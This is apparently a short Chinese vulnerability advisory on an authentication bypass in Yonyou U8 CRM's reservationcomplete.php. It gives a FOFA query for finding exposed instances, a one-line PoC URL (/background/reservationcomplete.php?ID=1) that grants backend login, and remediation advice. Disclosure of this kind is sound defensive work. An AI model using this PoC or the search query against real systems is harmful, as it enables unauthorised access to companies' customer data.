0x01 产品简介
用友U8 CRM客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。
0x02 漏洞概述
用友 U8 CRM客户关系管理系统 reservationcomplete.php文件存在逻辑漏洞,未授权的攻击者通过漏洞可以直接登录后台,获取系统内部敏感信息,使系统处于极不安全状态。
0x03 复现环境
FOFA:app="用友U8CRM"
0x04 漏洞复现
PoC
/background/reservationcomplete.php?ID=1拼接url访问页面接口,重新访问首页即可登录
0x05 修复建议
关闭互联网暴露面删除或修改相关功能模块代码
升级至安全版本
